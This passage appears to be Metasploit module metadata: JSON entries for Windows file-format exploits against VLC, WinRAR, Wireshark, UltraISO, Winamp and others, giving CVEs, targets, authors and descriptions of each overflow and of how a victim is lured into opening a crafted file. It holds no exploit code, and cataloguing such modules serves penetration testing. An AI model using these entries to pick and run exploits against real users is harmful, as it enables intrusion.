"/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/total_video_player_ini_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/tugzip": { - "name": "TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability", - "fullname": "exploit/windows/fileformat/tugzip", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-10-28", - "type": "exploit", - "author": [ - "Stefan Marin", - "Lincoln", - "TecR0c ", - "mr_me " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability\n in the latest version 3.5 of TugZip archiving utility.\n In order to trigger the vulnerability, an attacker must convince someone\n to load a specially crafted zip file with TugZip by double click or file open.\n By doing so, an attacker can execute arbitrary code as the victim user.", - "references": [ - "OSVDB-49371", - "CVE-2008-4779", - "BID-31913", - "EDB-12008" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/tugzip.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/tugzip", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ultraiso_ccd": { - "name": "UltraISO CCD File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/ultraiso_ccd", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-04-03", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CCD files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CCD file.\n\n NOTE: A file with the same base name, but the extension of \"img\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.", - "references": [ - "CVE-2009-1260", - "OSVDB-53275", - "BID-34363", - "BID-38613", - "EDB-8343" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal - Double-Click/Command Line Open Method", - "Windows Universal - File->Open + Toolbar Open Methods" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ultraiso_ccd.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ultraiso_ccd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ultraiso_cue": { - "name": "UltraISO CUE File Parsing Buffer Overflow", - "fullname": "exploit/windows/fileformat/ultraiso_cue", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-05-24", - "type": "exploit", - "author": [ - "n00b", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EZB Systems, Inc's\n UltraISO. When processing .CUE files, data is read from file into a\n fixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n can occur. Attackers can execute arbitrary code by convincing their victim\n to open an CUE file.\n\n NOTE: A file with the same base name, but the extension of \"bin\" must also\n exist. Opening either file will trigger the vulnerability, but the files must\n both exist.", - "references": [ - "CVE-2007-2888", - "OSVDB-36570", - "BID-24140", - "EDB-3978" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows - UltraISO v8.6.2.2011 portable", - "Windows - UltraISO v8.6.0.1936" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ultraiso_cue.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ultraiso_cue", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ursoft_w32dasm": { - "name": "URSoft W32Dasm Disassembler Function Buffer Overflow", - "fullname": "exploit/windows/fileformat/ursoft_w32dasm", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-01-24", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in W32Dasm <= v8.93.\n By creating a malicious file and convincing a user to disassemble\n the file with a vulnerable version of W32Dasm, the Imports/Exports\n function is copied to the stack and arbitrary code may be executed\n locally as the user.", - "references": [ - "CVE-2005-0308", - "OSVDB-13169", - "BID-12352", - "URL-http://aluigi.altervista.org/adv/w32dasmbof-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ursoft_w32dasm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/varicad_dwb": { - "name": "VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/varicad_dwb", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-03-17", - "type": "exploit", - "author": [ - "n00b", - "dookie", - "MC ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n An attacker must send the file to victim and the victim must open the file.", - "references": [ - "OSVDB-63067", - "BID-38815", - "EDB-11789" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/varicad_dwb", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/videocharge_studio": { - "name": "VideoCharge Studio Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/videocharge_studio", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-27", - "type": "exploit", - "author": [ - "metacom", - "Andrew Smith", - "Christian Mehlmauer " - ], - "description": "This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when\n processing a specially crafted .VSC file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.", - "references": [ - "OSVDB-69616", - "EDB-29234" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VideoCharge Studio 2.12.3.685" - ], - "mod_time": "2023-04-04 09:48:51 +0000", - "path": "/modules/exploits/windows/fileformat/videocharge_studio.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/videocharge_studio", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [], - "NOCVE": [ - "Reason not given" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/videolan_tivo": { - "name": "VideoLAN VLC TiVo Buffer Overflow", - "fullname": "exploit/windows/fileformat/videolan_tivo", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-10-22", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in VideoLAN VLC 0.9.4.\n By creating a malicious TY file, a remote attacker could overflow a\n buffer and execute arbitrary code.", - "references": [ - "CVE-2008-4654", - "OSVDB-49181", - "BID-31813" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VideoLAN VLC 0.9.4 (XP SP3 English)", - "VideoLAN VLC 0.9.2 (XP SP3 English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/videolan_tivo.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/videolan_tivo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/videospirit_visprj": { - "name": "VeryTools Video Spirit Pro", - "fullname": "exploit/windows/fileformat/videospirit_visprj", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-11", - "type": "exploit", - "author": [ - "Acidgen", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Video Spirit <= 1.70.\n When opening a malicious project file (.visprj), a stack buffer overflow occurs,\n resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", - "references": [ - "CVE-2011-0499", - "CVE-2011-0500", - "OSVDB-70619", - "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-001" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/videospirit_visprj.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/videospirit_visprj", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/visio_dxf_bof": { - "name": "Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability", - "fullname": "exploit/windows/fileformat/visio_dxf_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-05-04", - "type": "exploit", - "author": [ - "Unknown", - "Shahin Ramezany ", - "juan vazquez " - ], - "description": "This module exploits a stack based overflow vulnerability in the handling\n of the DXF files by Microsoft Visio 2002. Revisions prior to the release of\n the MS bulletin MS10-028 are vulnerable. The overflow occurs when the application\n is used to import a specially crafted DXF file, while parsing the HEADER section\n of the DXF file.\n\n To trigger the vulnerability an attacker must convince someone to insert a\n specially crafted DXF file to a new document, go to 'Insert' -> 'CAD Drawing'", - "references": [ - "CVE-2010-1681", - "OSVDB-64446", - "BID-39836", - "URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow", - "URL-http://web.archive.org/web/20101113032001/http://www.exploit-db.com:80/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Visio 2002 English on Windows XP SP3 Spanish", - "Visio 2002 English on Windows XP SP3 English" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/visio_dxf_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/visiwave_vwr_type": { - "name": "VisiWave VWR File Parsing Vulnerability", - "fullname": "exploit/windows/fileformat/visiwave_vwr_type", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-05-20", - "type": "exploit", - "author": [ - "mr_me ", - "TecR0c " - ], - "description": "This module exploits a vulnerability found in VisiWave's Site Survey Report application.\n When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'\n property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',\n 'Image'), but if a match isn't found, the function that's supposed to handle this routine\n ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]\n instruction. This allows attackers to overwrite it with any arbitrary value, and results code\n execution. A patch is available at visiwave.com; the fix is done by XORing the return value as\n null if no match is found, and then it is validated before use.\n\n NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a\n victim user to 'double click' the malicious VWR file and execute code. This module was also built\n to bypass ASLR and DEP.", - "references": [ - "CVE-2011-2386", - "OSVDB-72464", - "URL-http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html", - "URL-http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3/Windows 7 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/visiwave_vwr_type.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/visiwave_vwr_type", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_mkv": { - "name": "VLC Media Player MKV Use After Free", - "fullname": "exploit/windows/fileformat/vlc_mkv", - "aliases": [], - "rank": 500, - "disclosure_date": "2018-05-24", - "type": "exploit", - "author": [ - "Eugene Ng - GovTech", - "Winston Ho - GovTech" - ], - "description": "This module exploits a use after free vulnerability in\n VideoLAN VLC =< 2.2.8. The vulnerability exists in the parsing of\n MKV files and affects both 32 bits and 64 bits.\n\n In order to exploit this, this module will generate two files:\n The first .mkv file contains the main vulnerability and heap spray,\n the second .mkv file is required in order to take the vulnerable code\n path and should be placed under the same directory as the .mkv file.\n\n This module has been tested against VLC v2.2.8. Tested with payloads\n windows/exec, windows/x64/exec, windows/shell/reverse_tcp,\n windows/x64/shell/reverse_tcp. Meterpreter payloads if used can\n cause the application to crash instead.", - "references": [ - "CVE-2018-11529", - "EDB-44979" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VLC 2.2.8 on Windows 10 x86", - "VLC 2.2.8 on Windows 10 x64" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_mkv.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_mkv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_modplug_s3m": { - "name": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/vlc_modplug_s3m", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-04-07", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits an input validation error in libmod_plugin as\n included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n are affected. By creating a malicious S3M file, a remote attacker\n could execute arbitrary code.\n\n Although other products that bundle libmodplug may be vulnerable, this\n module was only tested against VLC.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it. As such,\n this module is capable of bypassing DEP, but not ASLR.", - "references": [ - "CVE-2011-1574", - "OSVDB-72143", - "URL-http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b", - "URL-https://seclists.org/fulldisclosure/2011/Apr/113" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VLC 1.1.8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_modplug_s3m", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_realtext": { - "name": "VLC Media Player RealText Subtitle Overflow", - "fullname": "exploit/windows/fileformat/vlc_realtext", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-11-05", - "type": "exploit", - "author": [ - "Tobias Klein", - "SkD", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow vulnerability in\n VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of\n RealText subtitle files.\n\n In order to exploit this, this module will generate two files:\n The .mp4 file is used to trick your victim into running. The .rt file\n is the actual malicious file that triggers the vulnerability, which\n should be placed under the same directory as the .mp4 file.", - "references": [ - "OSVDB-49809", - "CVE-2008-5036", - "BID-32125", - "URL-http://www.trapkit.de/advisories/TKADV2008-011.txt", - "URL-http://www.videolan.org/security/sa0810.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_realtext.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_realtext", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_smb_uri": { - "name": "VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow", - "fullname": "exploit/windows/fileformat/vlc_smb_uri", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-06-24", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in the Win32AddConnection\n function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are\n reportedly affected.\n\n This vulnerability is only present in Win32 builds of VLC.\n\n This payload was found to work with the windows/exec and\n windows/meterpreter/reverse_tcp payloads. However, the\n windows/meterpreter/reverse_ord_tcp was found not to work.", - "references": [ - "BID-35500", - "OSVDB-55509", - "CVE-2009-2484", - "URL-http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f", - "EDB-9029" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "vlc 0.9.9 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_smb_uri.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_smb_uri", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vlc_webm": { - "name": "VideoLAN VLC MKV Memory Corruption", - "fullname": "exploit/windows/fileformat/vlc_webm", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-01-31", - "type": "exploit", - "author": [ - "Dan Rosenberg" - ], - "description": "This module exploits an input validation error in VideoLAN VLC\n < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n could execute arbitrary code.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it.", - "references": [ - "OSVDB-70698", - "CVE-2011-0531", - "BID-46060", - "URL-http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456", - "URL-http://www.videolan.org/security/sa1102.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VLC 1.1.6 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vlc_webm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vlc_webm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vuplayer_cue": { - "name": "VUPlayer CUE Buffer Overflow", - "fullname": "exploit/windows/fileformat/vuplayer_cue", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack based overflow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n for the execution of arbitrary code.", - "references": [ - "OSVDB-64581", - "BID-33960" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VUPlayer 2.49" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vuplayer_cue", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/vuplayer_m3u": { - "name": "VUPlayer M3U Buffer Overflow", - "fullname": "exploit/windows/fileformat/vuplayer_m3u", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-08-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack over flow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted m3u file, an buffer is overwritten allowing\n for the execution of arbitrary code.", - "references": [ - "CVE-2006-6251", - "OSVDB-31710" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "VUPlayer 2.49" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/vuplayer_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/watermark_master": { - "name": "Watermark Master Buffer Overflow (SEH)", - "fullname": "exploit/windows/fileformat/watermark_master", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-01", - "type": "exploit", - "author": [ - "metacom", - "Andrew Smith" - ], - "description": "This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when\n processing a specially crafted .WCF file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Watermark Master to open a malicious .WCF file.", - "references": [ - "OSVDB-99226", - "CVE-2013-6935", - "EDB-29327" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x32 - Watermark Master 2.2.23", - "Windows 7 x64 - Watermark Master 2.2.23" - ], - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/exploits/windows/fileformat/watermark_master.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/watermark_master", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/winamp_maki_bof": { - "name": "Winamp MAKI Buffer Overflow", - "fullname": "exploit/windows/fileformat/winamp_maki_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-05-20", - "type": "exploit", - "author": [ - "Monica Sojeong Hong", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow in Winamp 5.55. The flaw\n exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,\n where memmove is used in an insecure way with user controlled data.\n\n To exploit the vulnerability the attacker must convince the victim to install the\n generated mcvcore.maki file in the \"scripts\" directory of the default \"Bento\" skin,\n or generate a new skin using the crafted mcvcore.maki file. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2009-1831", - "OSVDB-54902", - "BID-35052", - "EDB-8783", - "EDB-8772", - "EDB-8770", - "EDB-8767", - "URL-http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Winamp 5.55 / Windows XP SP3 / Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/winamp_maki_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/winamp_maki_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/winrar_ace": { - "name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution", - "fullname": "exploit/windows/fileformat/winrar_ace", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-02-05", - "type": "exploit", - "author": [ - "Nadav Grossman", - "Imran E. Dawoodjee " - ], - "description": "In WinRAR versions prior to and including 5.61, there is path traversal vulnerability\n when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename\n field is manipulated with specific patterns, the destination (extraction) folder is\n ignored, thus treating the filename as an absolute path. This module will attempt to\n extract a payload to the startup folder of the current user. It is limited such that\n we can only go back one folder. Therefore, for this exploit to work properly, the user\n must extract the supplied RAR file from one folder within the user profile folder\n (e.g. Desktop or Downloads). User restart is required to gain a shell.", - "references": [ - "CVE-2018-20250", - "EDB-46552", - "BID-106948", - "URL-https://research.checkpoint.com/extracting-code-execution-from-winrar/", - "URL-https://apidoc.roe.ch/acefile/latest/", - "URL-http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "RARLAB WinRAR <= 5.61" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/winrar_ace.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/winrar_ace", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/winrar_cve_2023_38831": { - "name": "WinRAR CVE-2023-38831 Exploit", - "fullname": "exploit/windows/fileformat/winrar_cve_2023_38831", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-23", - "type": "exploit", - "author": [ - "Alexander \"xaitax\" Hagenah" - ], - "description": "This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its\n embedded document, the decoy document is executed, leading to code execution.", - "references": [ - "CVE-2023-38831", - "URL-https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", - "URL-https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2024-05-28 14:01:31 +0000", - "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/winrar_cve_2023_38831", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/winrar_name_spoofing": { - "name": "WinRAR Filename Spoofing", - "fullname": "exploit/windows/fileformat/winrar_name_spoofing", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-09-28", - "type": "exploit", - "author": [ - "chr1x", - "juan vazquez " - ], - "description": "This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists\n when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from\n the central directory, but the file names used to extract and open contents come from the\n Local File Header. This inconsistency allows to spoof file names when opening ZIP files\n with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in\n March 2014", - "references": [ - "OSVDB-62610", - "BID-66383", - "URL-http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html", - "URL-http://an7isec.blogspot.co.il/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/winrar_name_spoofing.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/winrar_name_spoofing", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/wireshark_mpeg_overflow": { - "name": "Wireshark wiretap/mpeg.c Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/wireshark_mpeg_overflow", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-03-20", - "type": "exploit", - "author": [ - "Wesley Neelen", - "j0sm1" - ], - "description": "This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\n by generating a malicious file.", - "references": [ - "CVE-2014-2299", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843", - "URL-http://www.wireshark.org/security/wnpa-sec-2014-04.html", - "BID-66066" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinXP SP3 Spanish (bypass DEP)", - "WinXP SP2/SP3 English (bypass DEP)" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/wireshark_mpeg_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/wireshark_packet_dect": { - "name": "Wireshark packet-dect.c Stack Buffer Overflow (local)", - "fullname": "exploit/windows/fileformat/wireshark_packet_dect", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-18", - "type": "exploit", - "author": [ - "Paul Makowski", - "sickness", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n When opening a malicious .pcap file in Wireshark, a stack buffer occurs,\n resulting in arbitrary code execution.\n\n Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\")).", - "references": [ - "CVE-2011-1591", - "OSVDB-71848", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836", - "EDB-17185" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Win32 Universal (Generic DEP & ASLR Bypass)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/wireshark_packet_dect.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/wireshark_packet_dect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 